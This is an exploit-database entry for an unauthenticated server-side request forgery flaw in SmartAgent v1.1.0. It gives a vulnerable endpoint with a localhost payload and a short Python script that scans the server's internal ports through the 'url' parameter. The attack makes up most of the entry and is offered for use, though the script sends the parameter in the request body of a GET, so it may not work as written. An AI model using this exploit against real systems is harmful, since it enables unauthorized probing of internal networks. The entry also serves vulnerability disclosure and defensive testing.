Share
## https://sploitus.com/exploit?id=PACKETSTORM:182450
# Exploit Title: SmartAgent v1.1.0 - Server-Side Request Forgery (SSRF)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux  
  
An unauthenticated user can trigger the web server to perform web requests to the localhost via a GET request to the vulnerable script https://smarts-srlcom.com/FB/getFbVideoSource.php?url=http://127.0.0.1:80.  
  
The GET request includes the vulnerable parameter "url".  
  
  
Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0  
  
  
#Python Exploit  
  
import requests  
  
url = "https://smartagent.[client].com/FB/getFbVideoSource.php"  
port = input("Enter the port you want to check: ")  
  
parameter = {  
"url": "http://127.0.0.1:" + port  
}  
  
response = requests.get(url, data=parameter, verify=False)  
  
if response.status_code == 200:  
print(f"Port {port} is open on the server")  
else:  
print(f"Port {port} closed")